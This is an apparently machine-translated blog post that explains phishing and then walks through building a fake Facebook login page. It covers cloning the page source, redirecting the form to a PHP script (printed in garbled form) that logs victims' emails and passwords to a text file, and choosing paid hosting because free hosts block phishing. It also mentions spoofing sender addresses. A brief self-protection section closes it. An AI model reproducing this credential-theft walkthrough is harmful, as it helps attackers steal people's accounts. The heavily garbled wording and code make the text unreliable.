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Friday, February 23, 2018

What is phishing? | How to create a phishing page | Facebook

First of all let me tell you this article is written for education purpose only. Please do not use this method for wrong activities.

What are phishing

Phishing passwords are used to hacking and the most popular technology to steal sensitive information such as credit cards, banking usernames and passwords etc. Fishery Aka Fishing Invasion has a copy of duplicate copy of fake website or cloning of a reputed website in Iraq to steal user's password. Or other sensitive information such as credit card details. It is very popular for this phishing page to have little technical knowledge, and that's why this way is very popular. Phishing has scanned users quickly to enter sensitive details on anxiety webpage (phishing page) whose eyesight and feel are similar to legitimate web pages. In most cases, the only variation URL is. The URL can be spped in some cases if the valid website is weak. It is trustworthy to identify this phishing scam page for ordinary because its reliable layout.

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How does fishing work?
Hackers / Invaders target the general public and send them phishing links via email or via personalized message where the victim is called to link to email in the email. User / victim will navigate to the phishing page that becomes legal. Ordinary people who do not find the phishing page suspect, inspire to enter their sensitive information and all the information will be sent to the hacker / attacker.

Phishing example

Take Facebook as an example, find a page that looks like the Facebook login page but it is valid in a different URL such as or or any URL. When the user flights on this page, he may think that he is not a Facebook login page and asks to provide his user name and password. So, people who do not find suspicious login pages suspect may probably be sent to the hacker / attacker of their username, password and password, which was created, will be redirected to the original Facebook page at the same time. Real Life Example: John is a programmer, he makes a Facebook login page with some scripts to get user name and password information and to keep it in Peter is the friend of John. John Peter sends a message for "Hey Peter", if you find a way to make money online, you must definitely take a look at this at "Peter Navigate to the link and see the Facebook login page. Generally, Peter enters Facebook's username and password. Now Peter's username and password are sent to John and Peter's Money Money Tips Tips page again. Desita the httpswwwfaceboukcommakemoneyonlinetrickstipshtml. That is all Peter Facebook account has been hacked.

How to create a phishing page in minutes?

We are going to take the Facebook Phishing page as an example.

Go to, make sure you are not logged in to Facebook.
Press Ctrl U to see the source code.
Copy source code and paste it into Notepad.
Find the work attribute of the login form in the code. Find the keyboard "Ctrl F NotPad" without note citation without notice. The Facebook login page was filled with the action attribute Facebook login process URL, replace it with process.php
You should find the name of the input field by using the Inspection element (Ctrl Shft I in Chrome), in our case, email and pass
Save this file as index html
Now you must store the username and password in the phishing text txt name text
Create the file named process.php using the following code.
<? If ($ _ post [email ']] and release ($ _ post [pass'])) {$ password = file_ get_contents ('phishing. Txt'); $ Fishing = flower ("fishing" txt "," w "); fwrite ($ phishing, $ password. "Email:". $ _ POST ['Email']. ", Password". $ _ Post [[pass']. "\ n"); fclose ($ file); Echo '<script> window.location.href = "" </ script>'; } And echo '<script> window.location.href = "index.html" </ script>'; ?>

How to host a phishing page in the URL?

For the phishing page in the URL, you need two things.
1. Domain
2. Web hosting

1. Get Free Domain
If you pay for their hosting plans, you can create a free domain on the Bluehost. Once you create a domain, you need it for the hosting and setup name server. If you choose a bluest host, you will already set it because the ones who are not required to set up.

2. Get Web Hosting
Almost all free hosting panels will be phishing pages blocked. So you need to get any paid host hosting package, it will cost around US $ 4 a month. I like Bluehost for her excellent service and performance. Get Bluehost Shared Hosting and Free Domains Now. Once you've set up the domain, you can upload files using FTP software. Now you can test it.

How can you protect yourself from phishing scams?
Hackers can reach many ways like Email, Personal Messages, Facebook Messages, Website Ads, and more. Clicking a link from these messages will put you to the login page. When you find an email that navigates to the webpage, you only focus on one thing that the URL is because anyone can sponsor any sss, but when there is no XSS zero-day disability. What is the URL you see in the browser address bar? Is this really Is there any green color safe symbol (HTTPS) provided in the address bar? You can stop hacking by considering these questions. Also see the examples below for Facebook phishing pages.

Perfect Fishing Sheets

Most people do not suspect this page above (above the snapshot) because there is a prefix with the green color safe icon and there is no mistake at But how is this a phishing page? Note the URL correctly. This is so is the subdomain of Google Chrome does not distinguish subdomains and domains, unlike firefox. The SLC certificate (HTTPS) can be obtained from many vendors, some vendors provide SLS certificates for free for 1 year. This is not a big thing to create this great phishing page for a new fax. So be aware about it.

This is a common Facebook phishing page with some modifications on Facebook.

Phishing scam
The phishing scam attempts scanners / hackers / cybercrimes that make your sensitive information such as internet banking usernames and passwords, credit card details etc. To enter as described above, there is a focus on indirectly retrieving details of phishing as described above.

Phishing email
Most time fishing scams are via email. Hacks hide the email address of the right to send any valid website or phishing scam email, so users are confident that the email has been sent from a valid website. An email address can be faster by using email headers. Server scripting languages, such as PHP, make a simple way to easily spoop from email addresses. Popular email services like Gmail are smart enough to identify phishing emails and route to a spam folder. But still, there are some ways to hacker to send phishing emails.

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